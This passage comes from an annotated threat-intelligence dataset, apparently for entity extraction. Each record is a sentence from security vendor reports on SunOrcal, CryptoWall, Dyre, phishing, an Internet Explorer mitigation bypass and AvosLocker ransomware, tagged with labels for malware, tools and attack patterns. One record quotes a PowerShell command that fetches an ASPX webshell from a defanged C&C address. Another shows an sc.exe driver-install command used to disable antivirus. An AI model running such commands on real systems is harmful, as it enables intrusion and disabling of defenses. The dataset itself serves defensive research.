2016.","entities":[{"id":4998,"label":"malware","start_offset":18,"end_offset":24},{"id":5000,"label":"malware","start_offset":99,"end_offset":107},{"id":46876,"label":"TIME","start_offset":171,"end_offset":175}],"relations":[],"Comments":[]} -{"id":1686,"text":"While investigating Reaver we recently also discovered a new variant of the SunOrcal malware family.","entities":[{"id":45095,"label":"malware","start_offset":20,"end_offset":26},{"id":5004,"label":"malware","start_offset":76,"end_offset":84}],"relations":[],"Comments":[]} -{"id":1687,"text":"While the SunOrcal malware family has been confirmed to have been active since 2013, possibly even earlier, this new variant has been observed targeting regions outside of the typical target radius for this threat group, now expanding to include Vietnam and Myanmar.","entities":[{"id":5005,"label":"malware","start_offset":10,"end_offset":18},{"id":46877,"label":"TIME","start_offset":79,"end_offset":83},{"id":46878,"label":"location","start_offset":246,"end_offset":253},{"id":46879,"label":"location","start_offset":258,"end_offset":265}],"relations":[{"id":244,"from_id":5005,"to_id":46878,"type":"targets"},{"id":246,"from_id":5005,"to_id":46879,"type":"targets"}],"Comments":[]} -{"id":1688,"text":" How it Works","entities":[],"relations":[],"Comments":[]} -{"id":1689,"text":"Emails were sent to targets containing malicious attachments.","entities":[{"id":45097,"label":"attack-pattern","start_offset":39,"end_offset":60}],"relations":[],"Comments":[]} -{"id":1690,"text":"Targeting a Vietnamese speaking audience, one of the malicious documents mentions Donald Trump and the disputed South China Sea area.","entities":[{"id":46880,"label":"location","start_offset":112,"end_offset":132},{"id":46881,"label":"identity","start_offset":82,"end_offset":94},{"id":46882,"label":"attack-pattern","start_offset":53,"end_offset":72}],"relations":[],"Comments":[]} -{"id":1691,"text":"This is a classic lure technique – including something the target will find interesting or important causing them to open the file and download the malware on to the victims’ system.","entities":[],"relations":[],"Comments":[]} -{"id":1692,"text":" How to Defend Against it These malware attacks utilize email phishing, and relies on targets opening the malicious email attachment.","entities":[{"id":45098,"label":"attack-pattern","start_offset":106,"end_offset":132},{"id":45099,"label":"attack-pattern","start_offset":56,"end_offset":70},{"id":5021,"label":"attack-pattern","start_offset":62,"end_offset":70}],"relations":[],"Comments":[]} -{"id":1693,"text":"Security awareness is critical to avoid falling victim to such an attack.","entities":[],"relations":[],"Comments":[]} -{"id":1694,"text":" General email best practices: If you are unsure of the legitimacy of the email, contact the sender directly over the phone or by typing a trusted URL directly in your browser or saved bookmark.","entities":[],"relations":[],"Comments":[]} -{"id":1695,"text":"Additionally, keeping your systems and devices updated with the most current operating system and web browser is a general security best practice, as well as enabling multi-factor authentication to prevent an attacker from abusing credentials should they successfully capture them","entities":[],"relations":[],"Comments":[]} -{"id":1696,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":1697,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":1698,"text":"For a moment, put yourself in the shoes of a cyber criminal.","entities":[],"relations":[],"Comments":[]} -{"id":1699,"text":"You’ve collected an array of tools (malware), built up your infrastructure (command and control (C2) servers) and you have a process to make money off your hard work.","entities":[],"relations":[],"Comments":[]} -{"id":1700,"text":"You wake up on Monday morning and the domains your carefully built malware uses for command and control are shut down.","entities":[],"relations":[],"Comments":[]} -{"id":1701,"text":"Some security researcher has taken control of them, completely halting your operation.","entities":[],"relations":[],"Comments":[]} -{"id":1702,"text":"This would certainly be good news to anyone reading this blog, but for the criminal it’s a big setback and source of frustration.","entities":[],"relations":[],"Comments":[]} -{"id":1703,"text":"These kinds of takedowns are the impetus for some of the most impressive developments in malware technology over the last decade.","entities":[],"relations":[],"Comments":[]} -{"id":1704,"text":" Once attackers have infected a PC through some exploit or social engineering, one of their major challenges is keeping control of that system.","entities":[],"relations":[],"Comments":[]} -{"id":1705,"text":"Antivirus programs running on the PC are trying eradicate the threat, the command and control domains and IPs are being added to denylist and blocked by networks around the world.","entities":[],"relations":[],"Comments":[]} -{"id":1706,"text":"Many malware authors have taken to building complex mechanisms to ensure that their malware is resistant to these kind of blocks and takedowns.","entities":[],"relations":[],"Comments":[]} -{"id":1707,"text":"Some of the more innovative mechanisms include: These mechanisms are often only used when the primary (and simpler) C2 mechanism has been shut down, but their use makes shutting down a botnet much more challenging.","entities":[],"relations":[],"Comments":[]} -{"id":1708,"text":" Last year we highlighted two malware families on this blog: CryptoWall 2.0 and Dyreza\/Dyre.","entities":[{"id":46883,"label":"malware","start_offset":61,"end_offset":75},{"id":46884,"label":"malware","start_offset":80,"end_offset":86},{"id":46885,"label":"malware","start_offset":87,"end_offset":91}],"relations":[{"id":247,"from_id":46884,"to_id":46885,"type":"duplicate-of"}],"Comments":[]} -{"id":1709,"text":"CryptoWall is one of multiple ransomware families that generated income for the attacker by encrypting files on the infected PC with a private key that is in the control of the attacker.","entities":[{"id":5075,"label":"malware","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} -{"id":1710,"text":"The attacker then charges a ransom (normally around $500) to give up the key that will unlock the files.","entities":[],"relations":[],"Comments":[]} -{"id":1711,"text":" In October, CryptoWall 2.0 began using the Tor anonymity network to serve web pages to infected users who wanted their encrypted files back.","entities":[{"id":5083,"label":"tools","start_offset":44,"end_offset":47},{"id":46886,"label":"TIME","start_offset":4,"end_offset":11},{"id":46887,"label":"malware","start_offset":13,"end_offset":27}],"relations":[{"id":248,"from_id":46887,"to_id":5083,"type":"uses"}],"Comments":[]} -{"id":1712,"text":"In this case a legitimate service (Tor) was being abused by CryptoWall so it could avoid having its C2 servers shut down.","entities":[{"id":5086,"label":"malware","start_offset":60,"end_offset":70},{"id":5085,"label":"tools","start_offset":35,"end_offset":38}],"relations":[{"id":249,"from_id":5086,"to_id":5085,"type":"uses"}],"Comments":[]} -{"id":1713,"text":"In the past few weeks we've seen another anonymity network, I2P, being abused by both the latest version of CryptoWall (3.0) and the Dyre banking Trojan.","entities":[{"id":45100,"label":"malware","start_offset":108,"end_offset":124},{"id":45101,"label":"malware","start_offset":133,"end_offset":152},{"id":45102,"label":"SOFTWARE","start_offset":60,"end_offset":63},{"id":5088,"label":"malware","start_offset":108,"end_offset":118}],"relations":[],"Comments":[]} -{"id":1714,"text":" While I2P is far less popular than Tor, it provides similar functionality to the user.","entities":[{"id":5091,"label":"tools","start_offset":36,"end_offset":39},{"id":46888,"label":"SOFTWARE","start_offset":7,"end_offset":10}],"relations":[],"Comments":[]} -{"id":1715,"text":"I2P is an overlay network on top of the Internet that creates encrypted links between nodes that are running the I2P software.","entities":[{"id":46889,"label":"SOFTWARE","start_offset":0,"end_offset":3},{"id":46890,"label":"SOFTWARE","start_offset":113,"end_offset":116}],"relations":[],"Comments":[]} -{"id":1716,"text":"I2P users can access specific I2P services that are only accessible on I2P, or access Internet resources without exposing their IP address. In the case of CryptoWall 3.0, the malware is attempting to access multiple .i2p resources only accessible through I2P, also known as “eepSites.” The CryptoWall 3.0 uses I2P in the same way CryptoWall 2.0 used Tor, to give victims access to a decrypting service to get their files back.","entities":[{"id":45105,"label":"SOFTWARE","start_offset":71,"end_offset":74},{"id":45104,"label":"SOFTWARE","start_offset":30,"end_offset":33},{"id":45106,"label":"malware","start_offset":156,"end_offset":170},{"id":45107,"label":"SOFTWARE","start_offset":256,"end_offset":260},{"id":45108,"label":"malware","start_offset":292,"end_offset":306},{"id":45110,"label":"SOFTWARE","start_offset":312,"end_offset":315},{"id":45111,"label":"malware","start_offset":332,"end_offset":346},{"id":45103,"label":"SOFTWARE","start_offset":0,"end_offset":3},{"id":5104,"label":"tools","start_offset":352,"end_offset":355}],"relations":[{"id":250,"from_id":45111,"to_id":5104,"type":"uses"},{"id":252,"from_id":45108,"to_id":45111,"type":"related-to"},{"id":253,"from_id":45106,"to_id":45107,"type":"uses"},{"id":251,"from_id":45108,"to_id":45110,"type":"uses"}],"Comments":[]} -{"id":1717,"text":" The Dyre banking Trojan has multiple C2 mechanisms, including encrypted HTTPS requests to a list of hard-coded IP addresses, a DGA generating 1,000 new domains each day as well as an I2P based plugin.","entities":[{"id":46891,"label":"malware","start_offset":5,"end_offset":24},{"id":46892,"label":"SOFTWARE","start_offset":184,"end_offset":187}],"relations":[],"Comments":[]} -{"id":1718,"text":"These many C2 mechanisms make Dyre much more difficult to fully take down than a simple single (or small group) of C2s.","entities":[{"id":46893,"label":"malware","start_offset":30,"end_offset":34}],"relations":[],"Comments":[]} -{"id":1719,"text":"the following IP address are known Dyre C2 servers.","entities":[{"id":45113,"label":"Infrastucture","start_offset":35,"end_offset":50}],"relations":[],"Comments":[]} -{"id":1720,"text":" It’s not possible to list all of the domains generated by the DGA, which is the main advantage of this mechanism. To protect your network from the I2P communication used by both Dyre and CryptoWall 3.0, the easiest route is simply to identify I2P traffic and block it completely.","entities":[{"id":5120,"label":"malware","start_offset":189,"end_offset":199},{"id":46894,"label":"malware","start_offset":180,"end_offset":184},{"id":46895,"label":"SOFTWARE","start_offset":149,"end_offset":152},{"id":46896,"label":"SOFTWARE","start_offset":245,"end_offset":248}],"relations":[],"Comments":[]} -{"id":1721,"text":"While there are certainly many legitimate reasons to use an anonymity network, many organizations should be wary of I2P (or Tor) traffic transiting their network.","entities":[{"id":46898,"label":"SOFTWARE","start_offset":116,"end_offset":119},{"id":46897,"label":"tools","start_offset":124,"end_offset":127}],"relations":[],"Comments":[]} -{"id":1722,"text":"Palo Alto Networks App-ID technology can identify I2P traffic as well 51 other tunneling applications.","entities":[{"id":45115,"label":"SOFTWARE","start_offset":50,"end_offset":53},{"id":5127,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} -{"id":1723,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":1724,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":1725,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":1726,"text":"In recent research, Palo Alto Networks found attackers were creating fake versions of some well-known and well-trusted websites – including Adobe, DropBox, Facebook, and others- and putting malicious links to these sites into phishing emails sent to unsuspecting victims.","entities":[{"id":46901,"label":"SOFTWARE","start_offset":147,"end_offset":153},{"id":46903,"label":"identity","start_offset":20,"end_offset":38},{"id":46899,"label":"attack-pattern","start_offset":226,"end_offset":241},{"id":46900,"label":"SOFTWARE","start_offset":140,"end_offset":145},{"id":46902,"label":"SOFTWARE","start_offset":156,"end_offset":164}],"relations":[],"Comments":[]} -{"id":1727,"text":" Here we explain this type of attack and what you should do.","entities":[],"relations":[],"Comments":[]} -{"id":1728,"text":"What is it?","entities":[],"relations":[],"Comments":[]} -{"id":1729,"text":"A method attackers use to target you using email that you might not know about.","entities":[],"relations":[],"Comments":[]} -{"id":1730,"text":"Why should I care, what can it do to me?","entities":[],"relations":[],"Comments":[]} -{"id":1731,"text":"Attackers can gain access to your personal and financial information.","entities":[],"relations":[],"Comments":[]} -{"id":1732,"text":"They can also steal your computer’s processing power to mine for cryptocurrencies, which slows down your system.","entities":[],"relations":[],"Comments":[]} -{"id":1733,"text":"How can I prevent it?","entities":[],"relations":[],"Comments":[]} -{"id":1734,"text":"Avoid clicking on links that you get in email.","entities":[],"relations":[],"Comments":[]} -{"id":1735,"text":"If you get an email and need to go to that website, type the address in your web browser yourself.","entities":[],"relations":[],"Comments":[]} -{"id":1736,"text":"If the link is an email from someone you know, you can also contact them to find out if they meant to send it, and if it is safe to visit.","entities":[],"relations":[],"Comments":[]} -{"id":1737,"text":"What causes it?","entities":[],"relations":[],"Comments":[]} -{"id":1738,"text":"Attackers know that people will click on links in email.","entities":[],"relations":[],"Comments":[]} -{"id":1739,"text":"Especially when you get an email from someone that looks like someone you trust.","entities":[],"relations":[],"Comments":[]} -{"id":1740,"text":"How does it work?","entities":[],"relations":[],"Comments":[]} -{"id":1741,"text":"Attackers send emails that appear to be from a person or company that you trust.","entities":[],"relations":[],"Comments":[]} -{"id":1742,"text":"These emails contain malicious links that, when clicked on, lead you to an attacker’s page.","entities":[],"relations":[],"Comments":[]} -{"id":1743,"text":"In addition to taking steps so the attacker’s page mimics a legitimate one, attackers often mirror well known security images, like the lock symbol, to convince you that you are on a secure site.","entities":[],"relations":[],"Comments":[]} -{"id":1744,"text":"Once you’re on the attacker’s page, the attackers may ask you for personal information (like usernames, passwords, and bank account information) or to install software, or both.","entities":[],"relations":[],"Comments":[]} -{"id":1745,"text":"In recent research, we found attackers were using fake versions of some well-known and well-trusted sites:","entities":[],"relations":[],"Comments":[]} -{"id":1746,"text":"About: Threat Briefs are meant to help busy people understand real-world threats and how they can prevent them in their lives.","entities":[],"relations":[],"Comments":[]} -{"id":1747,"text":"They’re put together by Palo Alto Networks Unit 42 threat research team and are meant for you to read and share with your family, friends, and coworkers so you can all be safer and get on with the business of your digital life.","entities":[{"id":46904,"label":"identity","start_offset":24,"end_offset":71}],"relations":[],"Comments":[]} -{"id":1748,"text":"Got a topic you want us to write about for you, your friends, or your family?","entities":[],"relations":[],"Comments":[]} -{"id":1749,"text":"Email us at u42comms@paloaltonetworks.com.","entities":[{"id":45116,"label":"EMAIL","start_offset":12,"end_offset":41}],"relations":[],"Comments":[]} -{"id":1750,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":1751,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":1752,"text":"In February, Microsoft awarded $100,000 to Yu Yang (@Tombkeeper) for reporting a new mitigation bypass technique as part of Microsoft’s Bounty Program.","entities":[{"id":45119,"label":"identity","start_offset":43,"end_offset":50},{"id":45120,"label":"identity","start_offset":52,"end_offset":63},{"id":45117,"label":"TIME","start_offset":3,"end_offset":11},{"id":45121,"label":"identity","start_offset":124,"end_offset":133},{"id":45118,"label":"identity","start_offset":13,"end_offset":22}],"relations":[],"Comments":[]} -{"id":1753,"text":"Yu later demonstrated his research at CanSecWest in March.","entities":[{"id":46905,"label":"identity","start_offset":0,"end_offset":2}],"relations":[],"Comments":[]} -{"id":1754,"text":"In his slides, he mentioned that a \"god mode\" of Internet Explorer could be turned on by a one byte overwrite.","entities":[{"id":46906,"label":"SOFTWARE","start_offset":49,"end_offset":66}],"relations":[],"Comments":[]} -{"id":1755,"text":"However, he had to heavily redact this information due to an agreement between himself and Microsoft.","entities":[{"id":45122,"label":"identity","start_offset":91,"end_offset":100}],"relations":[],"Comments":[]} -{"id":1756,"text":"After his slides were released, researchers began working to determine what the missing parts were.","entities":[],"relations":[],"Comments":[]} -{"id":1757,"text":"And before long, Yuki Chen (@guhe120), a Chinese researcher, posted his answer.","entities":[{"id":46908,"label":"identity","start_offset":28,"end_offset":36},{"id":46907,"label":"identity","start_offset":17,"end_offset":26},{"id":46909,"label":"location","start_offset":41,"end_offset":48}],"relations":[{"id":254,"from_id":46907,"to_id":46908,"type":"duplicate-of"},{"id":255,"from_id":46907,"to_id":46909,"type":"located-at"},{"id":256,"from_id":46908,"to_id":46909,"type":"located-at"}],"Comments":[]} -{"id":1758,"text":"Although the code was removed soon after posting, a copy was still maintained and used by Metasploit.","entities":[{"id":45123,"label":"tools","start_offset":90,"end_offset":100}],"relations":[],"Comments":[]} -{"id":1759,"text":"Following this code, another researcher posted his VB script version using more advanced techniques.","entities":[],"relations":[],"Comments":[]} -{"id":1760,"text":"Yu Yang then pasted his shellcode that used similar methods to run arbitrary code, showing that the method Yuki Chen used is exactly the one that won Yu the $100,000 award.","entities":[{"id":46910,"label":"identity","start_offset":0,"end_offset":7},{"id":46911,"label":"identity","start_offset":107,"end_offset":116},{"id":46912,"label":"identity","start_offset":150,"end_offset":152}],"relations":[],"Comments":[]} -{"id":1761,"text":" The main idea of new exploitation technique is to alter a flag that is used to control the security setting of an ActiveX object.","entities":[],"relations":[],"Comments":[]} -{"id":1762,"text":"If an attacker could modify it, then any script can be run, such as downloading and executing a PE file, without any notification or alert.","entities":[],"relations":[],"Comments":[]} -{"id":1763,"text":"Further details were discussed in depth last month on Rapid7’s blog.","entities":[{"id":46913,"label":"identity","start_offset":53,"end_offset":60}],"relations":[],"Comments":[]} -{"id":1764,"text":"The most interesting aspect of this method is that it could bypass all existing mitigation techniques including DEP\/ASLR\/EMET, and it also defeats some academic methods such as Control Flow Integrity (CFI).","entities":[],"relations":[],"Comments":[]} -{"id":1765,"text":"So this raises another question: If there are no mitigation functions, do we have any other ways to defend against attacks similar to this?","entities":[],"relations":[],"Comments":[]} -{"id":1766,"text":" The first line of defense is the IPS.","entities":[],"relations":[],"Comments":[]} -{"id":1767,"text":"Although an attacker can use a variety of obfuscation techniques for HTML, we are still able to extract some features to create signatures.","entities":[],"relations":[],"Comments":[]} -{"id":1768,"text":"To address such an issue, we’ve created signatures 36442, 36468, and 36469 to provide coverage for the security flag overwrite.","entities":[],"relations":[],"Comments":[]} -{"id":1769,"text":"Although we are not aware of any attacks using this technique, these signatures have proven effective in our testing against code publicly available on the Internet. When we take a closer look at the three exploits in our blog post last month, we see that various exploit techniques are based on a singular condition, which is arbitrary memory access.","entities":[],"relations":[],"Comments":[]} -{"id":1770,"text":"Only when attackers have the right to read\/write any address can they utilize either Flash or ActiveX methods to get code execution.","entities":[],"relations":[],"Comments":[]} -{"id":1771,"text":"If we went even further, all three vulnerabilities are Use-After-Free bugs.","entities":[],"relations":[],"Comments":[]} -{"id":1772,"text":"The three vulnerabilities each contain code to alter a user-controlled address, and the code can be distilled down to the following operations:","entities":[],"relations":[],"Comments":[]} -{"id":1773,"text":" Here, xyz indicates a user-controlled address that contains the length of a vector object or length of an Int32Array.","entities":[],"relations":[],"Comments":[]} -{"id":1774,"text":"Using these operations, attackers are able to modify the length values to create an object with an incorrect size, which will allow for read and write operations to occur in memory that is not part of the vector object.","entities":[],"relations":[],"Comments":[]} -{"id":1775,"text":"The attackers can then use this object to perform further operations such as modification of security flag in ActiveX. To prevent such attacks, a better idea is to detect if an arbitrary address is accessed during execution.","entities":[],"relations":[],"Comments":[]} -{"id":1776,"text":"In WildFire, we added modules for web browser scripts and third party plugins such as Flash.","entities":[{"id":45125,"label":"SOFTWARE","start_offset":3,"end_offset":11},{"id":45126,"label":"SOFTWARE","start_offset":86,"end_offset":91}],"relations":[],"Comments":[]} -{"id":1777,"text":"One such module leverages the fact that the length of a vector object is always consistent with memory allocation, which means we can deduce the memory usage from the sum of the length of all allocated vectors.","entities":[],"relations":[],"Comments":[]} -{"id":1778,"text":"If the calculated value does not match the real value, it indicates some of the vector objects may have been modified.","entities":[],"relations":[],"Comments":[]} -{"id":1779,"text":"Using this method, we are able to provide length checking for Flash vector objects.","entities":[{"id":45127,"label":"SOFTWARE","start_offset":62,"end_offset":67}],"relations":[],"Comments":[]} -{"id":1780,"text":"This module validates the accessing behavior at runtime.","entities":[],"relations":[],"Comments":[]} -{"id":1781,"text":"If the length were suspicious, the detection module stops the malicious operation.","entities":[],"relations":[],"Comments":[]} -{"id":1782,"text":"Through our enterprise security platform, including IPS and WildFire, we continue to innovate and prevent advanced exploitation techniques.","entities":[{"id":45128,"label":"SOFTWARE","start_offset":60,"end_offset":68}],"relations":[],"Comments":[]} -{"id":1783,"text":"Leave a comment below let us know what you think.","entities":[],"relations":[],"Comments":[]} -{"id":1784,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":1785,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":1786,"text":"We found samples of AvosLocker ransomware that makes use of a legitimate driver file to disable antivirus solutions and detection evasion.","entities":[{"id":5282,"label":"malware","start_offset":20,"end_offset":30}],"relations":[],"Comments":[]} -{"id":1787,"text":"While previous AvosLocker infections employ similar routines, this is the first sample we observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys). ","entities":[{"id":5285,"label":"malware","start_offset":15,"end_offset":25},{"id":46915,"label":"FILEPATH","start_offset":212,"end_offset":224},{"id":46916,"label":"SOFTWARE","start_offset":180,"end_offset":205},{"id":46917,"label":"location","start_offset":108,"end_offset":110}],"relations":[{"id":257,"from_id":5285,"to_id":46916,"type":"targets"},{"id":258,"from_id":5285,"to_id":46917,"type":"targets"}],"Comments":[]} -{"id":1788,"text":"In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability Log4shell using Nmap NSE script.","entities":[{"id":45130,"label":"vulnerability","start_offset":103,"end_offset":112},{"id":45129,"label":"tools","start_offset":119,"end_offset":127},{"id":45131,"label":"vulnerability","start_offset":83,"end_offset":88}],"relations":[],"Comments":[]} -{"id":1789,"text":"Infection chain Figure 1. AvosLocker infection chain According to our analysis, the suspected entry point is via the Zoho ManageEngine ADSelfService Plus (ADSS) exploit: Figure 2.","entities":[{"id":5293,"label":"malware","start_offset":31,"end_offset":41},{"id":46920,"label":"vulnerability","start_offset":127,"end_offset":178}],"relations":[{"id":260,"from_id":5293,"to_id":46920,"type":"exploits"}],"Comments":[]} -{"id":1790,"text":"The ADSS exploit abusing CVE-2021-40539 Due to the lack of network traffic details, we could not identify the exact CVE ID of the security gap the attacker used.","entities":[{"id":46921,"label":"vulnerability","start_offset":25,"end_offset":39},{"id":46922,"label":"malware","start_offset":4,"end_offset":8}],"relations":[{"id":261,"from_id":46922,"to_id":46921,"type":"exploits"}],"Comments":[]} -{"id":1791,"text":"However, there are some indications that they abused the same vulnerability previously documented by Synacktiv during a pentest, CVE-2021-40539.","entities":[{"id":45132,"label":"vulnerability","start_offset":129,"end_offset":143},{"id":45133,"label":"identity","start_offset":101,"end_offset":110}],"relations":[],"Comments":[]} -{"id":1792,"text":"The gap we observed was particularly similar to the creation of JSP files (test.jsp), execution of keytool.exe with “null” parameters to run a crafted Java class\/code.","entities":[{"id":46924,"label":"FILEPATH","start_offset":75,"end_offset":83},{"id":46923,"label":"FILEPATH","start_offset":99,"end_offset":110}],"relations":[],"Comments":[]} -{"id":1793,"text":"Mapping the infection","entities":[],"relations":[],"Comments":[]} -{"id":1794,"text":"The ADSS JAVA component (C:\\ManageEngine\\ADSelfService Plus\\jre\\bin\\java.exe) executed mshta.exe to remotely run a remotely-hosted HTML application (HTA) file from the attackers’ command and control (C&C) server.","entities":[{"id":45134,"label":"FILEPATH","start_offset":25,"end_offset":76},{"id":45135,"label":"FILEPATH","start_offset":87,"end_offset":96}],"relations":[],"Comments":[]} -{"id":1795,"text":"Using Trend Micro™ Vision One™, we mapped out the processes that the infection performed to spawn the process.","entities":[{"id":46925,"label":"SOFTWARE","start_offset":6,"end_offset":30}],"relations":[],"Comments":[]} -{"id":1796,"text":" Figure 3. Remotely executing an HTA file from the C&C server.","entities":[],"relations":[],"Comments":[]} -{"id":1797,"text":"Screenshots taken from Trend Micro Vison One.","entities":[{"id":45136,"label":"SOFTWARE","start_offset":23,"end_offset":44}],"relations":[],"Comments":[]} -{"id":1798,"text":" Figure 4. HTA file connecting to the C&C ","entities":[],"relations":[],"Comments":[]} -{"id":1799,"text":"A closer look at the HTA file revealed that the mshta.exe downloads and executes the remotely hosted HTA file.","entities":[],"relations":[],"Comments":[]} -{"id":1800,"text":"The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the C&C server to execute arbitrary commands.","entities":[{"id":45137,"label":"tools","start_offset":31,"end_offset":41}],"relations":[],"Comments":[]} -{"id":1801,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} -{"id":1802,"text":"Obfuscated PowerShell script contains a shellcode","entities":[{"id":5314,"label":"tools","start_offset":11,"end_offset":21}],"relations":[],"Comments":[]} -{"id":1803,"text":" The PowerShell process will download an ASPX webshell from the C&C server using the command < cmd.exe \/c powershell -command Invoke-WebRequest -Uri hxxp:\/\/xx.xx.xx.xx\/subshell.aspx -OutFile \/ManageEngine\/ADSelfService Plus\/webapps\/adssp\/help\/admin-guide >.","entities":[{"id":45139,"label":"SOFTWARE","start_offset":44,"end_offset":48},{"id":45140,"label":"Infrastucture","start_offset":67,"end_offset":77},{"id":45141,"label":"URL","start_offset":152,"end_offset":184},{"id":45138,"label":"tools","start_offset":8,"end_offset":18},{"id":45142,"label":"FILEPATH","start_offset":194,"end_offset":257},{"id":5318,"label":"tools","start_offset":109,"end_offset":119},{"id":5317,"label":"tools","start_offset":98,"end_offset":105}],"relations":[],"Comments":[]} -{"id":1804,"text":"According to Synacktiv’s research, with this command, the downloaded ASPX webshell is downloaded from a remote IP address and saved to the directory, and still accessible to the attacker.","entities":[{"id":46927,"label":"SOFTWARE","start_offset":69,"end_offset":73},{"id":46926,"label":"identity","start_offset":13,"end_offset":22}],"relations":[],"Comments":[]} -{"id":1805,"text":"The attackers gathered system information using available tools such as whoami and systeminfo, as well as PowerShell commands.","entities":[{"id":5324,"label":"tools","start_offset":83,"end_offset":93},{"id":5325,"label":"tools","start_offset":106,"end_offset":116},{"id":46929,"label":"tools","start_offset":72,"end_offset":78}],"relations":[],"Comments":[]} -{"id":1806,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} -{"id":1807,"text":"Gather system information The code executes on the current domain controller to gather the username information, while the query user information gathers data about user sessions on a Remote Desktop Session Host server, name of the user, session ID, state of the session (either active or disconnected), idle time, date, and time the user logged on.","entities":[],"relations":[],"Comments":[]} -{"id":1808,"text":" Figure 7. Executed with the \/domain argument to collect username information Figure 8.","entities":[],"relations":[],"Comments":[]} -{"id":1809,"text":"query user information for session data ","entities":[],"relations":[],"Comments":[]} -{"id":1810,"text":"The PowerShell downloads, installs, and allows the remote desktop tool AnyDeskMSI through the firewall.","entities":[{"id":46930,"label":"tools","start_offset":4,"end_offset":14},{"id":46931,"label":"tools","start_offset":71,"end_offset":81}],"relations":[{"id":262,"from_id":46930,"to_id":46931,"type":"downloads"}],"Comments":[]} -{"id":1811,"text":" Figure 9. The PowerShell downloading and installing AnyDeskMSI ","entities":[{"id":5340,"label":"tools","start_offset":19,"end_offset":29},{"id":46932,"label":"tools","start_offset":57,"end_offset":67}],"relations":[{"id":263,"from_id":5340,"to_id":46932,"type":"downloads"}],"Comments":[]} -{"id":1812,"text":"We observed that a new user account was created, added to the current domain, and included in the administrator group.","entities":[],"relations":[],"Comments":[]} -{"id":1813,"text":"This ensures the attacker can have administrative rights to the infected system.","entities":[],"relations":[],"Comments":[]} -{"id":1814,"text":"The attackers also checked the running processes in the system via TaskList to check for antivirus processes running in the infiltrated system.","entities":[],"relations":[],"Comments":[]} -{"id":1815,"text":" Figure 10. Creating a new account with admin rights Figure 11. Checking for antivirus processes running During the scan, we observed an attempt to terminate security products initiated via TaskKill.","entities":[],"relations":[],"Comments":[]} -{"id":1816,"text":"Testing the sample with Trend Micro Vision One, the attempt failed as its sensors were still able to send activity data to the platform.","entities":[{"id":46933,"label":"SOFTWARE","start_offset":24,"end_offset":46}],"relations":[],"Comments":[]} -{"id":1817,"text":" Figure 12.","entities":[],"relations":[],"Comments":[]} -{"id":1818,"text":"Terminating security products running Tools and functions","entities":[],"relations":[],"Comments":[]} -{"id":1819,"text":"Additional tools and components were copied to the compromised machine using AnyDeskMSI to scan the local network and disable security products.","entities":[{"id":46934,"label":"tools","start_offset":77,"end_offset":87},{"id":46936,"label":"attack-pattern","start_offset":91,"end_offset":113},{"id":46937,"label":"attack-pattern","start_offset":118,"end_offset":143}],"relations":[{"id":265,"from_id":46934,"to_id":46936,"type":"uses"},{"id":266,"from_id":46934,"to_id":46937,"type":"uses"}],"Comments":[]} -{"id":1820,"text":"The tools transferred using AnyDesk are: Netscan: To scan for other endpoints Nmap (log4shell.nse): To scan for Log4shell vulnerable endpoints Hacking tools Mimikatz and Impacket: For lateral movement PDQ deploy: For mass deployment of malicious script to multiple endpoints Aswarpot.sys: For disabling defense solutions.","entities":[{"id":46938,"label":"tools","start_offset":28,"end_offset":35},{"id":46944,"label":"tools","start_offset":158,"end_offset":166},{"id":46951,"label":"attack-pattern","start_offset":294,"end_offset":321},{"id":46940,"label":"tools","start_offset":79,"end_offset":83},{"id":46942,"label":"FILEPATH","start_offset":85,"end_offset":98},{"id":46947,"label":"tools","start_offset":171,"end_offset":179},{"id":46939,"label":"tools","start_offset":42,"end_offset":49},{"id":46943,"label":"vulnerability","start_offset":113,"end_offset":122},{"id":46950,"label":"FILEPATH","start_offset":276,"end_offset":288},{"id":46948,"label":"attack-pattern","start_offset":185,"end_offset":201},{"id":46949,"label":"attack-pattern","start_offset":218,"end_offset":253},{"id":46953,"label":"tools","start_offset":202,"end_offset":212},{"id":46956,"label":"tools","start_offset":276,"end_offset":284},{"id":46955,"label":"attack-pattern","start_offset":104,"end_offset":108}],"relations":[{"id":272,"from_id":46938,"to_id":46947,"type":"downloads"},{"id":267,"from_id":46938,"to_id":46939,"type":"downloads"},{"id":268,"from_id":46938,"to_id":46940,"type":"downloads"},{"id":269,"from_id":46940,"to_id":46942,"type":"uses"},{"id":271,"from_id":46938,"to_id":46944,"type":"downloads"},{"id":273,"from_id":46938,"to_id":46953,"type":"downloads"},{"id":276,"from_id":46938,"to_id":46956,"type":"downloads"}],"Comments":[]} -{"id":1821,"text":"We noted that it can disable a number of antivirus products, previously identified by Aon’s researchers.","entities":[{"id":45143,"label":"identity","start_offset":86,"end_offset":103}],"relations":[],"Comments":[]} -{"id":1822,"text":" Figure 13. Copying tools and other malicious components to the compromised machine using AnyDesk ","entities":[{"id":5369,"label":"tools","start_offset":95,"end_offset":102}],"relations":[],"Comments":[]} -{"id":1823,"text":"We found an Avast anti-rootkit driver installed as service 'asWarPot.sys' using the command sc.exe create aswSP_ArPot2 binPath= C:\\windows\\aswArPot.sys type= 